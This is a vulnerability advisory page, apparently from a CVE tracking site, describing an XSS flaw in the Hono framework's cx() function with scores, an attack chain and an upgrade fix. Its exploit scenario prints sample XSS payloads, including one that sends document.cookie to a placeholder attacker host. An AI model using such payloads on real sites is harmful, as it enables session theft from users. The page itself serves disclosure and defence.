Skip to main content

Hono CVE-2026-59895

| EUVDEUVD-2026-42327 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-08 GitHub_M
6.1
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

Scope:Changed because SSR injection crosses to victim browser; PR:N as attacker only supplies untrusted input; UI:R since victim must load the rendered page; no availability impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Patch available
Jul 08, 2026 - 18:02 EUVD
Analysis Generated
Jul 08, 2026 - 17:15 vuln.today

DescriptionCVE.org

Hono is a Web application framework that provides support for any JavaScript runtime. From 4.0.0 before 4.12.27, cx() in hono/css composes class names from plain strings but marks the result as already escaped without HTML-escaping the input, allowing untrusted className values used in a JSX class attribute during server-side rendering to break out of the attribute and inject arbitrary markup. This issue is fixed in version 4.12.27.

AnalysisAI

Server-side rendering XSS in Hono's hono/css module (versions 4.0.0 through 4.12.26) allows injection of arbitrary HTML markup by exploiting the cx() function's failure to HTML-escape input before marking it as safe. When untrusted data flows into a cx() call used in a JSX class attribute during SSR, attackers can break out of the attribute context and inject arbitrary markup or script into the rendered page delivered to victims. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker supplies crafted input to application
Delivery
Untrusted value passed to cx() in JSX class attribute
Exploit
cx() marks output as HTML-safe without escaping
Execution
SSR serializes unescaped metacharacters into HTML response
Persist
Victim loads the affected page
Impact
Injected script or markup executes in victim's browser

Vulnerability AssessmentAI

Exploitation Exploitation requires three concurrent conditions: (1) the application runs Hono version 4.0.0 through 4.12.26; (2) the application uses the cx() function from hono/css within a JSX class attribute during server-side rendering; and (3) at least one argument to cx() is derived from untrusted, attacker-influenced input (e.g., query parameters, user-supplied data, database values not separately sanitized). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N scoring 6.1 (Medium) is well-calibrated for this vulnerability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker targets a Hono SSR application that reflects a user-controlled value - such as a URL query parameter or stored user preference - into a JSX class attribute via cx(). By supplying a crafted value such as `legit-class" onmouseover="alert(document.cookie)` or `x"><img src=x onerror=fetch('https://attacker.example/'+document.cookie)>`, the attacker causes the SSR output to include unescaped HTML, injecting a malicious event handler or script tag. …
Remediation Upgrade Hono to version 4.12.27 or later, which resolves the improper escaping in cx() per the GitHub release at https://github.com/honojs/hono/releases/tag/v4.12.27. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Hono

View all
CVE-2024-48913 MEDIUM POC
5.9 Oct 15

Hono, a web framework, prior to version 4.6.5 is vulnerable to bypass of cross-site request forgery (CSRF) middleware by

CVE-2024-32869 MEDIUM POC
5.3 Apr 23

Hono is a Web application framework that provides support for any JavaScript runtime. Rated medium severity (CVSS 5.3),

CVE-2024-43787 MEDIUM POC
5.0 Aug 22

Hono is a Web application framework that provides support for any JavaScript runtime. Rated medium severity (CVSS 5.0),

CVE-2023-50710 MEDIUM POC
4.3 Dec 14

Hono is a web framework written in TypeScript. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploita

CVE-2026-27700 HIGH
8.2 Feb 25

Hono is a Web application framework that provides support for any JavaScript runtime. [CVSS 8.2 HIGH]

CVE-2026-22818 HIGH
8.2 Jan 13

Hono versions before 4.11.4 allow JWT algorithm confusion attacks through improper algorithm validation in the JWK/JWKS

CVE-2026-22817 HIGH
8.2 Jan 13

Hono before version 4.11.4 contains a JWT algorithm confusion vulnerability in its JWK/JWKS verification middleware that

CVE-2026-29045 HIGH
7.5 Mar 04

Hono versions prior to 4.12.4 suffer from an authentication bypass in serveStatic when combined with route-based middlew

CVE-2020-27217 HIGH
7.5 Nov 13

In Eclipse Hono version 1.3.0 and 1.4.0 the AMQP protocol adapter does not verify the size of AMQP messages received fro

CVE-2025-71381 MEDIUM
6.9 Jun 30

Header injection in Hono's CORS middleware exposes applications to cache key pollution across versions before 4.10.3. Wh

CVE-2026-56762 MEDIUM
6.9 Jun 23

Missing cookie name validation on the write path in Hono's setCookie(), serialize(), and serializeSigned() functions all

CVE-2026-59896 MEDIUM
6.5 Jul 08

Server-side rendering in Hono's JSX module (versions 4.11.8 through before 4.12.27) fails to isolate context values per

Share

CVE-2026-59895 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy